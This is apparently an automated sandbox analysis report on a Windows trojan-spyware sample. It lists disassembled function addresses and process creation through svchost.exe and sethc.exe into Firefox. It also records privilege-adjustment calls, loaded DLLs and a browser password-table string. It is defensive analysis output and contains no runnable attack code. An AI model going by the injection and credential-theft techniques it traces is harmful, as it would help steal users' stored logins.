                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028AE2_2_004028AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028B02_2_004028B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F2F32_2_0042F2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C282_2_00402C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C302_2_00402C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104F32_2_004104F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035C02_2_004035C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ECE2_2_00416ECE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ED32_2_00416ED3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E6F32_2_0040E6F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107132_2_00410713
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F41A22_2_032F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032856302_2_03285630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD22_2_03203FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD52_2_03203FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CAE4F66_2_04CAE4F6
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB24466_2_04CB2446
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA44206_2_04CA4420
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CC05916_2_04CC0591
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C005356_2_04C00535
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C1C6E06_2_04C1C6E0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BFC7C06_2_04BFC7C0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C247506_2_04C24750
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C007706_2_04C00770
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C920006_2_04C92000
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB81CC6_2_04CB81CC
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CC01AA6_2_04CC01AA
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C881586_2_04C88158
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BF01006_2_04BF0100
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C9A1186_2_04C9A118
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C802C06_2_04C802C0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA02746_2_04CA0274
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CC03E66_2_04CC03E6
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C0E3F06_2_04C0E3F0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBA3526_2_04CBA352
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BF0CF26_2_04BF0CF2
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA0CB56_2_04CA0CB5
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C00C006_2_04C00C00
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BFADE06_2_04BFADE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C18DBF6_2_04C18DBF
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C0AD006_2_04C0AD00
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C9CD1F6_2_04C9CD1F
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBEEDB6_2_04CBEEDB
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C12E906_2_04C12E90
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBCE936_2_04CBCE93
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C00E596_2_04C00E59
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBEE266_2_04CBEE26
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C0CFE06_2_04C0CFE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C7EFA06_2_04C7EFA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BF2FC86_2_04BF2FC8
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C74F406_2_04C74F40
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C42F286_2_04C42F28
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C20F306_2_04C20F30
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA2F306_2_04CA2F30
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BE68B86_2_04BE68B8
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C2E8F06_2_04C2E8F0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C0A8406_2_04C0A840
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C028406_2_04C02840
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C029A06_2_04C029A0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CCA9A66_2_04CCA9A6
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C169626_2_04C16962
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BFEA806_2_04BFEA80
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB6BD76_2_04CB6BD7
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBAB406_2_04CBAB40
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BF14606_2_04BF1460
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBF43F6_2_04CBF43F
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C9D5B06_2_04C9D5B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB75716_2_04CB7571
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB16CC6_2_04CB16CC
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBF7B06_2_04CBF7B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C070C06_2_04C070C0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CAF0CC6_2_04CAF0CC
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB70E96_2_04CB70E9
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBF0E06_2_04CBF0E0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C0B1B06_2_04C0B1B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CCB16B6_2_04CCB16B
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C3516C6_2_04C3516C
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BEF1726_2_04BEF172
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C1B2C06_2_04C1B2C0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA12ED6_2_04CA12ED
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C052A06_2_04C052A0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C4739A6_2_04C4739A
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB132D6_2_04CB132D
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04BED34C6_2_04BED34C
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBFCF26_2_04CBFCF2
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C79C326_2_04C79C32
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C1FDC06_2_04C1FDC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C03D406_2_04C03D40
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB1D5A6_2_04CB1D5A
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB7D736_2_04CB7D73
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C09EB06_2_04C09EB0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C01F926_2_04C01F92
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBFFB16_2_04CBFFB1
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBFF096_2_04CBFF09
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C038E06_2_04C038E0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C6D8006_2_04C6D800
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C099506_2_04C09950
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C1B9506_2_04C1B950
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C959106_2_04C95910
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CADAC66_2_04CADAC6
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C45AA06_2_04C45AA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C9DAAC6_2_04C9DAAC
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CA1AA36_2_04CA1AA3
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBFA496_2_04CBFA49
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CB7A466_2_04CB7A46
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C73A6C6_2_04C73A6C
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C75BF06_2_04C75BF0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C3DBF96_2_04C3DBF9
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C1FB806_2_04C1FB80
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04CBFB766_2_04CBFB76
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C91DD06_2_00C91DD0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8CCC06_2_00C8CCC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8AEC06_2_00C8AEC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8CEE06_2_00C8CEE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8B0066_2_00C8B006
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C8B0106_2_00C8B010
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C954A06_2_00C954A0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9369B6_2_00C9369B
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C936A06_2_00C936A0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CABAC06_2_00CABAC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE6CE6_2_04ABE6CE
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABD7986_2_04ABD798
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE2156_2_04ABE215
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04ABE3346_2_04ABE334
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: String function: 0050EC2F appears 68 times
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: String function: 00516AC0 appears 42 times
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: String function: 0051F8A0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04C7F290 appears 105 times
                Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04C35130 appears 58 times
                Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04BEB970 appears 277 times
                Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04C47E54 appears 102 times
                Source: C:\Windows\SysWOW64\sethc.exeCode function: String function: 04C6EA12 appears 86 times
                Source: ek8LkB2Cgo.exe, 00000000.00000003.1307471416.00000000041A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ek8LkB2Cgo.exe
                Source: ek8LkB2Cgo.exe, 00000000.00000003.1309440321.000000000434D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ek8LkB2Cgo.exe
                Source: ek8LkB2Cgo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053CE7A GetLastError,FormatMessageW,0_2_0053CE7A
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052AB84 AdjustTokenPrivileges,CloseHandle,0_2_0052AB84
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0052B134
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0053E1FD
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00536532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00536532
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0054C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0054C18C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004F406B
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeFile created: C:\Users\user~1\AppData\Local\Temp\autC7D8.tmpJump to behavior
                Source: ek8LkB2Cgo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sethc.exe, 00000006.00000002.3776235683.0000000003003000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1751128525.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1748561473.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3776235683.0000000002FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ek8LkB2Cgo.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\ek8LkB2Cgo.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
                Source: C:\Windows\SysWOW64\sethc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: playsndsrv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: secur32.dllJump to behavior
